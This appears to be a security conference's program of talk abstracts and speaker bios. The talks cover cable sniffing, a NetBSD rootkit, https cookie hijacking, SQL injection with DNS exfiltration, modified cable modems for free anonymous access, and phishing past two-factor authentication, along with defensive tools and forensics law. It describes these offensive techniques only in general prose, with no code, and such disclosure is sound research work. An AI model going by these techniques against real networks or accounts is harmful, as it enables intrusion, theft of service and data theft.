DOCSIS (Data Over Cable Service Interface Specification) is currently the most used protocol around the world for providing internet over TV coaxial cable. Due to its nature, this protocol can easily be sniffed by tapping onto the TV cable using a digital TV card. By doing this, you can not only sniff your own connection but all the connections of the entire neighborhood. With my tool packet-o-matic and an inexpensive DVB-C card, countless things are possible, ranging from dumping people's email into a maildir to removing firewall rules and quota limitations on your connection or even a DoS of all HTTP communications by injecting TCP reset packets.

Guy Martin is an active open source developer interested in all technologies that come into his hands. After porting Gentoo Linux to the HPPA architecture five years ago, he is now primarily focused on writing a new kind of sniffer, packet-o-matic.

Toasterkit, a Modular NetBSD Rootkit


Anthony Martinez
Systems Administrator, New Mexico Tech
Thomas Bowen
Systems Administrator, New Mexico Tech

NetBSD is a portable operating system for just about every architecture available. There is a notable lack of tools available for the penetration tester. In this talk we will present Toasterkit, a generic NetBSD rootkit. It has been tested on i386, Mac PPC, and VAX systems.

Anthony Martinez is a system administrator for the New Mexico Tech Computer Center, and an undergraduate Computer Science student at the university.

Thomas Bowen is a system administrator for the New Mexico Tech Computer Center, and an undergraduate student in Computer Science with an emphasis in Information Assurance. He has been accepted into the Scholarship for Service program, funded by the National Science Foundation, and plans to also complete his Master of Science in Computer Science at the university.

Bringing Sexy Back: Breaking in with Style


David Maynor
CTO, Errata Security
Robert Graham
CTO, Errata Security

Security is getting better; there is no doubt about that. High value targets are increasing their security while buying into the buzzword hype with phrases like "defense in depth". Firewalls, IPS, AV, NAC, and a host of other technologies have done a lot to give the pointy-haired bosses of the world the ability to sleep easy...or have they? While those PHBs sleep easy in their beds, the ability to compromise a site at will continues to grow.

Remember the good old days of planting Trojans in microcontrollers of your enemy's hardware or shipping packages with system updates that contain backdoors? What happened to those days? What if I told you that breaking into a site is as easy as sending a package via some third party carrier or throwing up a website. This talk will cover penetration techniques that at first glance appear to be Hollywood fiction but are easy and reliable methods of intrusion.

Miss this talk and you may never know why you have a package in your shipping department addressed to "U R Owned, INC.".

David Maynor is a founder of Errata Security and serves as the Chief Technical Officer. Mr. Maynor is responsible for day-to-day technical decisions of Errata Security and also employs a strong background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor has previously been the Senior Researcher for Secureworks and a research engineer with the ISS Xforce R&D team, where his primary responsibilities included reverse engineering high risk applications, researching new evasion techniques for security tools, and researching new threats before they become widespread. Before ISS, Maynor spent 3 years at Georgia Institute of Technology (GaTech), with the last two years as part of the information security group, as an application developer helping make the sheer size and magnitude of security incidents on campus manageable.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WW-II codebreaker. His first IDS was written more than 10 years ago, designed to catch Morris-worm copycats. He is the author of several pending patents in the IDS field. He is the author of well-regarded security-related documents and is a frequent speaker at conferences. Previously he was the chief scientist of Internet Security Systems. Before that he was the co-founder, CTO, and chief architect of Network ICE, which was acquired by Internet Security Systems.

Forensics is ONLY for Private Investigators


Scott Moulton
President of Forensic Strategy Services, LLC

If the only requirement for you to become a Computer Forensic person is to be a Private Investigator, why would you ever take a certification again? You would never need to be a CCE (computer certified examiner), nor any other certification of any kind. You would be one of the only people in your area that could legally do the job, and why spend a single dime you don't have to? These new laws will destroy certifications and qualifications as we know them, and we will be pushed out of our own industry!

I was one of the first experts to be challenged on the new Private Investigator laws while on the stand testifying in a criminal case in 2006. This is the bill that actually passed in 2006, a week before I took the stand and was challenged by the state prosecution. It simply states that doing any kind of 'digital investigation' without a PI license is a felony.

http://www.legis.state.ga.us/legis/2005_06/fulltext/hb1259.htm

When they passed the law in March of 2006 they intended for it to go into effect on July 1st, 2006 with no grandfather clause. Since it takes 2 years to become a PI in the state of Georgia, everyone that was a third party practicing forensics would immediately be committing a felony.

In Georgia it is a 2 year apprenticeship, then a test and a pile of money and insurance (PIs have to have 2 million in E&O) and then 40 hours of continuing education a year specifically on PI topics in certified classes. Currently I do not know of any on computer forensics that qualify for the PI continuing education. The inclusion of computer forensics in the PI license does not change a single item of the existing PI tests, knowledge base, or requirements. A security guard would be able to do a computer forensic job legally where the CISSP could not.

Since this time, my company has become a Private Investigation company and I have a Private Investigator License. This is a talk about the struggles of becoming a PI and what the laws are for computer forensics going forward. Everyone that does computer security for any legal purpose, or computer forensics as a third party, stands to lose as these laws are being passed all over the United States. In the future it may be impossible for "you" to go out on your own doing any kind of "DIGITAL" security or forensic work, limiting your future forever!

I hope that everyone who never pays any attention to legislation and their own laws spends a little time reviewing the laws they are trying to slip in without your even knowing it is coming. There is a great ignorance amongst computer security and computer forensic people who just disbelieve this can even happen. However, a few states like Texas have already made this a law and it is affecting the industry now, causing quite a few well-known computer forensic people to walk away from jobs. I hope everyone listens and gets involved and joins together this fragmented society of computer security and forensic people into one voice that makes the states take notice that we will not stand by and let government make our choices for our future!

If you are in a computer forensic job or collect any kind of digital evidence for any legal purpose, you might want to be aware of what is about to happen to your jobs! Now is the time to get knowledgeable about this topic and do what you can to prevent it from becoming the requirement for you to have a job. Computer Forensics/Security and Private Investigations are so different that many people will never believe that is what will enable you to be able to do your job. This will destroy certifications as we know them for many digital fields.

Scott Moulton began his forensic computer career with a specialty in rebuilding hard drives for investigation purposes and has rebuilt hard drives for several cases including murder investigations, corporate fraud, civil defense and criminal defense.

Scott was the first person arrested for Port Scanning and won his case back in 2000 when the judge declared Port scans legal. Scott has also been fighting against computer forensic people and computer security people having to become private investigators for which laws are being passed in each state making it a felony to do any kind of 'digital investigation' without a PI License.

Scott has spent more than a year digging into repairing Solid State Hard Drives and understands the ins and outs and how it will affect recovery and forensics in the future. Many forensic jobs will change due to the fact that some information will not be accessible in the future.

Solid State Drives Destroy Forensic & Data Recovery Jobs: Animated!


Scott Moulton
President of Forensic Strategy Services, LLC

This speech is all ANIMATION in 3D! Data on a Solid State Device is virtualized, and the Physical Sector that you are asking for is not actually the sector it was 5 minutes ago. The data moves around using wear leveling schemes controlled by the drive using proprietary methods. When you ask for Sector 125, its physical address block is converted to an LBA block and every 5 write cycles the data is moved to a new and empty previously erased block. This destroys metadata used in forensics & data recovery. File Slack Space disappears; you can no longer be sure that the exact physical sector you are recovering was in the same location or has not been moved, or find out what it used to be!

I will explain how Flash and Solid State Drives are different and compare them to hard drives in their ability to read and write data. What happens when they are damaged and a recovery needs to be done? In this process you will see how the data gets shuffled around and how some of the data is destroyed in the process, making it impossible in many cases to recover some files and metadata whose recovery on a hard drive has been a simple task by comparison. You will also get an idea about how the proprietary methods that each vendor is using will isolate you from knowing what is happening to your data or even where it is on the drive. And at the very least the animation is the quality of the History Channel and you will enjoy what you are learning!

Scott Moulton began his forensic computer career with a specialty in rebuilding hard drives for investigation purposes and has rebuilt hard drives for several cases including murder investigations, corporate fraud, civil defense and criminal defense.

Scott was the first person arrested for Port Scanning and won his case back in 2000 when the judge declared Port scans legal. Scott has also been fighting against computer forensic people and computer security people having to become private investigators for which laws are being passed in each state making it a felony to do any kind of 'digital investigation' without a PI License.

Scott has spent more than a year digging into repairing Solid State Hard Drives and understands the ins and outs and how it will affect recovery and forensics in the future. Many forensic jobs will change due to the fact that some information will not be accessible in the future.

Beholder: New wifi monitor tool


Nelson Murilo
Security Researcher
Luiz 'effffn' Eduardo
Security Researcher

Although it's not something new at all, network administrators are still facing (and having to deal with) old problems and threats. One of these problems is being able to detect rogue and/or fake access points in their networks and surroundings. The current solutions available are mostly commercial and/or proprietary, and we haven't yet seen any open-source tool that specifically implements WIDS capabilities. We would like to introduce to DefCon: Beholder.

The talk will include a brief introduction on the general state of the commercial WIDS tools and the evolution of wireless attacks, and will be mostly focused on the Beholder project. Beholder is a C language open-source tool available (for now) for Linux platforms; it can be used with any 802.11 technology a NIC may support, and it isn't driver dependent, running with all available Linux wifi drivers. The tool does, of course, some basic network scanning, but also implements some simple (but cool) stuff that some of the commercial tools don't have. The presentation will cover details about the tool, future features, scenarios to be implemented, examples, and a demo (yep, demo at DefCon) of malicious APs/tools in action and how Beholder can be used to detect them.

Nelson Murilo has been a Network Security Analyst since 1992. He is the author of two network security books in Portuguese, regular contributor of the Brazilian Computer Emergency Response Team security guides and technical papers and a regular speaker at security conferences in Brazil and abroad. Nelson is the author and co-author of open source security tools such as:

* chkrootkit - locally checks for the presence of a rootkit
* Btsearch - tool developed to find hidden Bluetooth devices

Luiz 'effffn' Eduardo has over 15 years of experience working with network security and, for the past 6 years, has been mostly dedicated to wireless security, protocol fuzzing and computer incident response. He is somewhat known in the scene for planning, implementing and supporting wireless networks at security conferences like DefCon, BlackHat, Computer Chaos Congress, Shmoocon, Layerone, etc. He's one of the DefCon networking team goons and has spoken previously at Shmoocon, DefCon, Toorcon, Hack in the Box Malaysia and other cons. Luiz currently holds the following certifications: CISSP, CWNE, CEH, GCIH and GISP, and has probably been able to get them due to long flights around the globe and flight delays in airports (thanks, United!)

Both Nelson and Luiz are among the organizers of the conference you sh0t the sheriff, which takes place in Sao Paulo, Brazil.

Good Viruses. Evaluating the Risks


Dr. Igor Muttik
Sr. Architect McAfee Avert Labs

This session will discuss the risks associated with the creation of replicating code. The combination of the wide availability of virus source code and the problem of control over replicating code makes these experiments quite risky. To demonstrate these points we shall see how a computer virus was once created unintentionally in a self-modifying tool called ALREADY.COM (we'll disassemble and debug it). We shall watch a video of the "Corrupted blood" epidemic in World of Warcraft, when a virtual "good" virus got out of control. We will examine the "beneficial" properties of the W32/Nachi worm and discuss the pros and cons of harnessing replication for patching vulnerabilities.

Dr. Igor Muttik graduated from Moscow State University in 1985. His Ph.D. in 1989 was based on the research of semi- and super-conductors. He became interested in computer viruses in 1987 when PCs in the lab were infected with Cascade.

In 1995 he joined Dr.Solomon's Software in the UK as a Virus Researcher. In 1999 he headed Avert in Europe and now is Senior Avert Labs Architect. He speaks regularly at security conferences.

Brain Games: Make your own Biofeedback Video Game


Ne0nRa1n

Joe "Kingpin" Grand
Founder, Grand Idea Studios

More and more scientific studies are weighing in on video games and their positive benefits. The dated idea of video games being damaging to one's health and a waste of time is slowly being replaced with the idea of video games as high-tech therapy. By incorporating sensors to measure the player's physiological state, game play performance can be affected or altered. Among the various types of biofeedback, heart rate variability is one of the easiest to understand and build hardware for. In this presentation, not only will we guide you through how to construct simple hardware to read your own heart rate and provide you with some open-source code as a starting point for your future favorite biofeedback game designs, we will also use a real-live human volunteer from the audience to demonstrate the technology!

Ne0nRa1n, a veteran DEFCON speaker on the human brain and all its wonders, stumbled onto the 'computer underground' almost a decade ago and yet she still somehow has never managed to graduate from any secondary institution, still has never held a job of any great importance and still has yet to write a book. After eventually realizing that she would never become what society wanted her to be, she now happily works quietly at home on her projects, some of which she shares at DEFCON.

Joe "Kingpin" Grand is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of The Man, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel, and has even done some stuff with biofeedback devices on the program. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

Anti-RE Techniques in DRM Code


Jan Newger
Security Researcher

In order to prevent music from being copied among consumers, content providers often use DRM systems to protect their music files. This talk describes the approach taken while analysing a DRM system (whose identity needs to be kept secret due to legal issues). It is shown what techniques were used to protect the system from being easily reverse engineered. This is not about how to hack $Insert_DRM_Here. No decryption tools or information on how to write one will be released.

Jan Newger has been enjoying Reverse Engineering for years and he is going to receive his diploma in CS towards the end of the year. He has been working on several software projects in the field of mechanical engineering.

VoIPER: Smashing the VoIP stack while you sleep


N.N.P.
Hacker, UnprotectedHex.com

With VoIP devices finding their way into the majority of major enterprises and a significant number of residential installations, the possible consequences of a security vulnerability that can be leveraged by malicious hackers are ever increasing. While the security of data and voice traffic has been extensively promoted and tested, the security of the devices themselves has been poorly tested at best. A remote vulnerability in a VoIP device could subvert all other VoIP security, and as a result extensive testing of both VoIP device software and hardware is needed if we are to prevent future intrusions.

During this talk I will outline why the security of the software powering VoIP networks is of critical importance and why businesses, developers and security auditors need to pay more attention to the software they are deploying, developing and testing in real world installations. I will show the need for an automated, black box, protocol compliant and open source testing suite. I will then present VoIPER, a cross platform, easy to use toolkit that can automatically and extensively test VoIP devices as well as providing extensive target management, logging and crash detection critical to modern security testing. VoIPER includes a fuzzing suite which is fully protocol aware and can generate hundreds of thousands of tests for the major VoIP protocols. Unlike many attempts at fuzzing VoIP, VoIPER can interact with the devices under test in a fully protocol compliant fashion and potentially test their entire state spaces. Its classes are easy to use and extendable to allow users to piece together protocol compliant tests and integrate them with the main test suite.

VoIPER has been used to discover security vulnerabilities in every device tested during its initial testing phase including soft-phones, hard-phones, gateways and servers.

N.N.P. is a hacker from Ireland whose primary interests are in automating the vulnerability discovery and exploit development processes. He has been involved in the hacking and security communities for 6 years and has discovered vulnerabilities in a variety of different applications. At the moment his main focus is on exploiting VoIP devices and the application of formal verification methods and dynamic binary instrumentation to fuzzing. He runs UnprotectedHex.com and is an administrator on the SmashTheStack wargaming network.


The World of Pager Sniffing/Interception: More Activity than one may suspect


NYCMIKE
Hobbyist Signals Collector

Paging networks once sat at the top of the personal and professional communication pyramid. Cell phone technologies have since replaced the now-legacy networks at the consumer level; with the exception of niche markets (due to the signal quality indoors: IT, Emergency Services, Government), the technology may have been retired to a permanent stay in a junk pile. With the fleeting attention and use, it appears that sniffing/interception of pager traffic within the United States has declined to almost a standstill. The scope of this paper is to re-introduce the activity of FLEX (1600/3200 level 2, 3200/6400 level 4) and POCSAG (512, 1200, 2400), then present how a hobbyist can decode it, provide a first-hand account of how to install and operate a pager "listening post", introduce a few ways to use captured cap codes, and offer a conceptual "new" technique in capturing pager traffic. With that said, my expertise is limited and I by no means should be considered an expert, nor should this writing be interpreted as testament. Last but not least, there are laws governing RF interception and they must be adhered to (this means you). Decoding digital data with a soundcard nowadays is easier than getting on the internet.

Hacking OpenVMS


Christer Öberg
Security Researcher
Claes Nyberg
Security Researcher
James Tusini
Security Researcher

OpenVMS is considered a highly secure and reliable operating system relied upon by large enterprises around the globe such as Stock Exchanges, Governments and Infrastructure for critical operations. Our talk will focus on subverting the security of the OpenVMS operating system in a number of new and creative ways. There will be an initial brief introduction to the OS basics, security model and its core features. We will also talk about things we perceive as flaws in the security model and weaknesses in the security features provided by OpenVMS. There will also be a practical demonstration of the 0day vulnerabilities found, ranging from logical to memory corruption bugs, along with discussion on how these were found and exploited and obstacles encountered in the process.

Christer is based in the UK. He enjoys discovering and exploiting new software vulnerabilities in pretty much everything except web applications. His favorite targets are OS kernels and "unusual" things like OpenVMS. Christer has previously presented at Black Hat Europe, USA and Defcon.

Claes Nyberg is interested in vulnerability research and the development of tools and exploits in both userland and kernel space. Claes has released popular tools such as MITM-SSL and MITM-SSH as well as one of the first public non-listening shell servers, SAdoor. Claes has previously spoken at Black Hat US and Defcon.

James Tusini is a security consultant based in the UK, currently employed as a principal consultant for a London-based firm. Since 2000, James has been undertaking penetration tests and running bespoke projects for large firms within the financial, retail and government sectors. Coming from a programming background, James enjoys discovering new vulnerabilities and keeping abreast of any new development in the security industry. His interests are not limited to technical stuff though, as he is very keen on the non-technical aspects of process manipulation too, such as social engineering, psychology and hypnosis.


Every Breath You Take


Jim O'Leary
Security Researcher

How much data do you generate in the process of living an ordinary day? This talk covers various ways to gather, persist and analyze the data stream that is your life. We'll cover a few of the approaches that are available today, some easy code you can whip up to persist anything you please, and what to expect from the community and businesses moving forward. Privacy/security impact is sure to be huge, so hold on to your hats, and start tracking and logging everything! Somebody else may be doing it for you already.

Jim O'Leary is a security dude, doing security things. Typically not a fan of speaking in the third person, or self-important bios, he has the following creds: compsci & psych degrees, cissp, contributions to a few books, security-related patents in various states of filing, and a pretty sweet job in Redmond. Identity thieves and overzealous bio researchers can check out bio.jimio.com.


365-Day: Active Https Cookie Hijacking


Mike Perry
Reverse Engineer, Riverbed Technology

Last year during my Tor presentations at Black Hat and Defcon, and in a follow up post on BugTraq, I announced that many SSL secured websites are vulnerable to cookie hijacking by way of content element injection. Unfortunately, my announcement was overshadowed by Robert Graham's passive cookie stealing attacks (aka 'SideJacking').

The difference between our attacks is this: instead of sniffing passively for cookies, it is possible to actively cull them from targets on your local network by injecting images/iframes for desired sites into unrelated webpages. Moreover, since many sites do not set the 'secure' bit for their SSL cookies, it is even possible to grab cookies used in https sessions and use them to impersonate users. This will be demonstrated.

At the time of this writing, vulnerable SSL sites include Gmail, Facebook, Amazon, and many others. Since wide-spread awareness of the threat seems to be the only way to convince these vendors that they need to secure their cookies, fully automated exploit code will be provided two weeks after the demonstration (however, it is also possible to steal insecure https cookies with just airpwn and wireshark).

Mike Perry is a forward and reverse engineer employed by Riverbed Technology. He also moonlights as a volunteer for the Tor Project, and considers security a hobby. He is somewhat annoyed that the https cookie issues he discussed are still not fixed on most major websites, a full year later.


Urban Exploration - A Hacker's View


Phreakmonkey

mutantMandias

Urban Exploration is the practice of discovering and exploring (and often photographing) the more "off-beat" areas of human civilization. Popular targets of Urban Exploration include abandoned hospitals or institutions, empty factories, and other disused structures, but it can also include "active" sites such as service corridors, utility levels, rooftops, storm drains, steam tunnels, you name it.

For years, the Urban Exploration community and Hacker community have existed in parallel despite their many commonalities. This talk will introduce UrbEx to the DefCon community and explore the similarity of the mindsets between those who explore the far reaches of cyberspace and those who explore the forgotten areas of the real world.

Bring an open mind, a sense of adventure, and any experiences you've had when you've wandered into a forgotten or "off limits" area just to see what's there. You might already be an Urban Explorer and not have realized it!

K.C. (Phreakmonkey) is a computer security engineer by trade and has attended DefCon for ten consecutive years. When he is not staring at computer screens he likes to apply his abstract thinking abilities to exploring the world around him and photographing what he discovers. K.C. has been exploring since he was a young child, when his mother had a penchant for self-guided tours of half-built houses. Ever since, he has been drawn to seeing what lies beyond unmarked doors or off-limits hallways. In recent years K.C. has combined photography with his love of the relics of our disposable infrastructure. Through sharing these photographs and experiences, he found that many people around him share his fascination with the forgotten and behind-the-scenes view of the world.

Mandias (mutantMandias) is an IT guy, Photographer, and Agitator who tries not to be blind to the world around him, and is constantly amazed by what people fail to see. He thinks that the back of a No Trespassing sign is beautiful, and always feels better when he is on the "other" side of barriers designed to keep people out. His exploration fetish was partially fed as a youngster by seeing a pro Neutron Bomb propaganda film which depicted a glorious victory over an enemy by simply melting away all of the people, leaving the buildings and industry intact. He thought it was a really cool idea, and likes to take pictures that embody that kind of feeling, but thinks that actually melting away all of the people in the world might take too much effort.

Mandias has explored and photographed with lots of people, in locations from Japan to Denmark to Canada. He is a founding member of S(UE), and habitually makes an ass of himself.

K.C. is a member of the Atlanta Urban Exploration League "AUEL" and the Southern Urban Explorers "S(UE)".


Malware Detection through Network Flow Analysis


Bruce Potter
Founder, The Shmoo Group

Over the last several years, we've seen a decrease in effectiveness of "classical" security tools. The nature of the present day attacks is very different from what the security community has been used to in the past. Rather than wide-spread worms and viruses that cause general havoc, attackers are directly targeting their victims in order to achieve monetary or military gain. These attacks are blowing right past firewalls and anti-virus and placing malware deep in the enterprise. Ideally, we could fix this problem at its roots; fixing the software that is making us vulnerable. Unfortunately that's going to take a while, and in the interim security engineers and operators need new, advanced tools that allow deeper visibility into systems and networks while being easy and efficient to use.

This talk will focus on using network flows to detect advanced malware. Network flows, made popular by Cisco's NetFlow implementation available on almost all their routers, have been used for years for network engineering purposes. And while there has been some capability for security analysis against these flows, there has been little interest until recently. This talk will describe NetFlow and how to implement it in your network. It will also examine advanced statistical analysis techniques that make finding malware and attackers easier. I will release a new version of Psyche, an open source flow analysis tool, and show specific examples of how to detect malware on live networks. I will also release a tool designed to craft and spoof NetFlow records for injection into NetFlow collectors.

Bruce Potter is the founder of the Shmoo Group of security, crypto, and privacy professionals. He is also the co-founder and CTO of Ponte Technologies, a company focused on developing and deploying advanced IT defensive technologies. His areas of expertise include wireless security, network analysis, trusted computing, pirate songs, and restoring hopeless vehicles. Mr. Potter has co-authored several books including "802.11 Security" and "Mastering FreeBSD and OpenBSD Security" published by O'Reilly and "Mac OS X Security" by New Riders.


The true story of the Radioactive Boyscout:


The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb


Paul F. Renda
Data Security Analyst

David Hahn was working on his atomic energy Eagle Scout badge when he had the idea: why not build a reactor? However, not just any reactor; he would build a breeder reactor. This type of reactor produces more fuel and power as long as it is working. David used social engineering, unlimited drive and resourcefulness to produce his reactor-type device. He succeeded further than any expert in the nuclear world would have dreamed.

Ultimately, the EPA had to clean up his work shed as a nuclear and chemical waste site.

I am going to perform a couple of Simple Safe demos related to David's work.

The second part of the talk will deal with Homeland Security's model of the dirty bomb. I will show how David's reactor relates to the current model.

At the end of the talk, I will issue the first annual Dr. Strangelove award for the best question submitted to me. I have a lot of material to cover, so try to study up on reactors.

Paul F. Renda started his career working on the IBM 360 and the PDP 11. He was an early advocate of using hacking software to check corporate data systems and has presented talks at the Computer Security Institute. Paul's articles have appeared in Info Security magazine.

In 1995, Paul developed a defense against war dialers. His process was published in Info Security Magazine. A dialer is a program that dials a series of phone numbers and logs the numbers that are connected to a modem. He is currently a computer security analyst.


How can I pwn thee? Let me count the ways


Renderman
Church of WiFi

The wonders of technology have given rise to a new breed of workforce, the mobile workforce. Able to leap large oceans in a single cattle class bound, they are the newest agent of business and the newest pain in your butt. The average business traveler carries with him a multitude of ways to get pwn'd while away from the office and away from your watchful BOFH eye. Come count the ways we can pwn that beleaguered business traveler without even touching him.

Renderman is a Canadian born and raised hacker, co-refounder of the Church of Wifi and a 10 year attendee of Defcon and numerous other hacker cons. He has been a highly visible and active member of the wardriving community, helping to improve attacks where he can, such as the WPA-PSK rainbow tables. Co-author of "RFID Security" and "Kismet Hacking" by Syngress publishing, he can usually be found taking something wireless apart and stuffing it inside a children's plaything, picking locks, at the bar, or looking for more employment to keep up his globe trotting, hacker con lifestyle.


10 things that are pissing me off


Renderman
Church of WiFi

This year will be my 10th year of Defcon and my liver has the scars to prove it. In that time I've learned that this community can do anything. In that time I've also become a jaded and bitter IT consultant, and there are a lot of things pissing me off in the tech world. Some of these things have pissed me off so much that I'm finally doing something about it; for others I need your help. Come get an idea of what's in my head pissing me off, and probably pissing you off as well, and what you and I can do about it.

Renderman is a Canadian born and raised hacker, co-refounder of the Church of Wifi and a 10 year attendee of Defcon and numerous other hacker cons. He has been a highly visible and active member of the wardriving community, helping to improve attacks where he can, such as the WPA-PSK rainbow tables. Co-author of "RFID Security" and "Kismet Hacking" by Syngress publishing, he can usually be found taking something wireless apart and stuffing it inside a children's plaything, picking locks, at the bar, or looking for more employment to keep up his globe trotting, hacker con lifestyle.


The Big Picture: Digital Cinema Technology and Security


Mike Renlund
Security Researcher

Digital Cinema. It's the first major upgrade to a movie's image in more than 50 years, and it has brought new standards of quality, security, and technology into your local theater complex. This talk will cover what the new BIG PICTURE is all about, the changes made from film, both in the image and sound, and the new security methods involved that help prevent piracy. 3D and alternative content will also be discussed. Come see where the technology stands, where it is going, and how to get the most out of your movie-going experience.

Mike Renlund has been a fan of movies ever since he can remember. In 2001 he made the jump from online digital content to movie exhibition. For the past several years Mike has been working with major equipment manufacturers and studios to advance the field and bring a better experience to the masses. Mike has consulted for national and local chains on the repair and design of digital cinema systems and the installation of new equipment.


New Tool for SQL Injection with DNS Exfiltration


Robert Ricks
Senior Information Systems Engineer, G2, Inc.

For years people have been warned that blind SQL injection is a problem, yet there are a multitude of vulnerable websites out there to this day. Perhaps people don't realize that these vulnerabilities are very real. The current state-of-the-art tools for exploiting blind SQL injection are Absinthe and SQL Brute. DNS exfiltration has been proposed as a method of reaching previously unassailable blind SQL injection access points. We have created a proof-of-concept tool which can download an Oracle schema and data from its tables in an automated fashion using DNS as its exfiltration mechanism. Unlike Absinthe, this tool does not require any difference between successful and unsuccessful queries to work. It is also much faster than current tools since it can retrieve more than one byte of information at a time and doesn't require noticeable differences in timing. Perhaps this will help people realize that their private data is exceedingly vulnerable if they have even one SQL injection access point and don't take appropriate precautions.

Robert Ricks: Bob works for G2, Inc. as a senior information systems engineer. He has experience in data mining, artificial intelligence and development of security and exploitation tools.


Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving


Or, Techniques of Industrial Espionage

Eric Schmiedl
Security Researcher

Your stack is smash-proof. Your dumpster is fully alarmed. And your firewall is so secure that it has former Soviet officials green with envy. So why are the developers finding their undocumented features in competitors' products, or company executives on a constant hunt for leaks and traitors? There's a whole lot more to doing an end-run around network security than calling up and pretending to be the help desk or hoping someone chucks a service manual in the trash. Professional attackers with specific targets have a whole rash of techniques -- from using targeted employees to hiding microphones -- adopted from the world of espionage, and this talk is all about how they do what they do.

Eric Schmiedl has spoken on access control systems at BlackHat 2007 and safecracking at DEFCON 14. He is a member of the TOOOL.US Board of Directors, maintains a semblance of an undergraduate career at the Massachusetts Institute of Technology, and has been picking locks all his life.


Gaming - The Next Overlooked Security Hole


Ferdinand Schober
Security Researcher

"Thanks to Web 2.0 and other over hyped BS, development has been moving farther and farther away from bare metal. Assuming you trust your libraries, this could even be called a good thing. If you're high."

PC gaming, despite Microsoft's best efforts, is not dead. Yet. The modding community is alive and active, and even those same over-hyped web technologies are starting to encroach into shaders and other things they shouldn't touch. Let's not even get started on the shady communities providing bots, cheats, and other grey market goods.

We're now seeing those unifying technologies, the web, and monolithic engines making their way into these games. Automatic updates, electronic publishing systems, in-game advertisements, pay-for-item MMORPG systems: all of these represent structural weaknesses that more and more people should be exploiting. Given the expectations of today's gamers as far as graphics, physics, and other frivolous crap, smaller developers have to purchase someone else's engine to get started, and all of the bugs that come with it.

This presentation will begin with a quick overview of what we've seen so far, and will progress into specific weak points in current and future releases.

High points will include:

* Why buying someone else's engine is a bad idea (with charts!)
* The proliferation of middleware, and the homogenization of gaming
* The little "nude patch" that could: how to own yourself
* Fake world + real money + ??? = Profit, or the economics of game exploits

Ferdinand Schober has been ranting about games for several years, and has been playing them in lieu of sleep since grade school. He recently left a security testing position with the highest ranked game publisher.


Making a Text Adventure Documentary


Jason Scott
Textfiles.com

For the past 3 years, Jason Scott (creator of BBS: The Documentary) has been working on another project, telling the history and the legends of text adventure games. 80 interviews later, he comes to DEFCON to show footage, describe the process of making the film, why history of games is important, and what it was like to visit the actual cave the first adventure game was based on.

Jason Scott is celebrating 10 years of running his computer history archive TEXTFILES.COM. He is a documentary filmmaker, computer historian, retro-nostalgia cynic, and blabbermouth. He lives in Massachusetts with a very, very large pile of stuff. His weblog tends to be at http://ascii.textfiles.com.


Free Anonymous Internet Using Modified Cable Modems


Blake Self
Security Researcher, SERC
DevDelay

Bitemytaco
Co-owner, Surfboard Hacker

Using various modifications and techniques - it is possible to gain free and anonymous cable modem internet access. This talk will analyze and discuss the tools, techniques, and technology behind both hacking cable modems and attempting to catch the users who are hacking cable modems. Previously confidential information gained from a senior network technician at Time Warner will be disclosed in this speech. We will also talk about how these techniques have been used to keep various heavily used servers online and anonymous for over six months without detection.

Blake Self is most widely known for co-authoring the first commercial encrypted instant messenger with Dr. Cyrus Peikari while at VirusMD. He has also worked as a SIPRNET Administrator, Department of Defense Red Team Analyst, and R&D at various corporations including Airscanner and Ontario Systems. He currently works as an analyst for the Healthcare and Debt Collection industries as well as doing research for SERC (http://www.serc.net).

Bitemytaco is the co-owner of Surfboard Hacker (www.sbhacker.net), the best modem hacking website and forum. He is an expert on DOCSIS and Motorola cable modem modification, especially the SB5100 and SB5101. He also made possible and funded the development of the first hacked firmware for the SB5101, SBH Haxorware (by Rajkosto).


StegoFS


James Shewmaker
Bluenotch

This talk will reintroduce classic steganographic techniques to use with serializing, watermarking, or stashing your data in the latest Internet meme. Why not let everyone who is forwarding yet another painful nut-shot AFHV clip store your data for you? We will create a simple filesystem that is robust enough to survive conversion, and build a structure to organize the data, focusing on indirection and fault tolerance.

Jim has over 15 years' experience in IT, primarily developing appliances for automation and security for broadcast radio, Internet, and satellite devices. He is one of the first GIAC Platinum certified Malware (GSM) experts and a SANS Institute Instructor. Jim's primary focus areas are investigations, penetration testing, and analysis. He actively contributes to SANS courseware and is an occasional FreeBSD port contributor.


Let's Sink the Phishermen's Boat!


Teo Sze Siong
Security Researcher, F-Secure Corporation
Hirosh Joseph
Security Researcher, F-Secure Corporation

In this presentation, an advanced form of phishing attack will be discussed to show how criminals might steal the entire balance of an online banking account protected with a daily transaction limit, bypassing the 2-factor authentication system. This type of attack is able to work in stealthy mode without showing symptoms of theft in the bank account balance, keeping the victims in the dark. Challenges and limitations encountered by the existing phishing detection techniques will also be identified and reviewed to understand the applicability of each technique in different scenarios.

As a step taken to combat phishing attacks effectively, the concept of 'website appearance signature' will be presented, with an explanation of how this new concept can be applied to detect unknown phishing websites. This has been a great challenge in the past since most phishing website detection tools verify the reputation of a website using a database of blacklisted URLs. In addition, a Proof-Of-Concept application employing the 'website appearance signature' combined with conventional phishing detection techniques will be demonstrated to show its accuracy and effectiveness as a phishing website detection tool.

Teo Sze Siong started programming at the age of 12. He is currently a Security Researcher at F-Secure Corporation, mainly working on threat analysis automation systems and honeyclient related research. His previous jobs as a Software Engineer with IRIS Corporation and Technical Consultant for InfiniteQL Group's R&D have exposed him to the security needs of various industries such as the government sector, casinos, telecommunications, banking and property management companies. He has designed and implemented the Kingdom of Bahrain National Passport smartcard application, the ePerolehan smartcard application for the Malaysian government, real-time SCADA software for Maxis Communications and large scale video streaming and backup solutions for the Genting Casino Group. He has also developed a generic smartcard applet testing framework and APDU interpreter engine for IRIS Corporation. Last year, he represented Malaysia at the United Nations ICT forum in Geneva, Switzerland. Some of his achievements include:

Certified Penetration Testing Specialist
Certified Scrum Master
2nd runner up of Microsoft Imagine Cup 2004 (Software design)
Youngest speaker at the Hack In The Box Security Conference 2004
Winner team in the AstroTechnoloGenius Contest, Malaysia

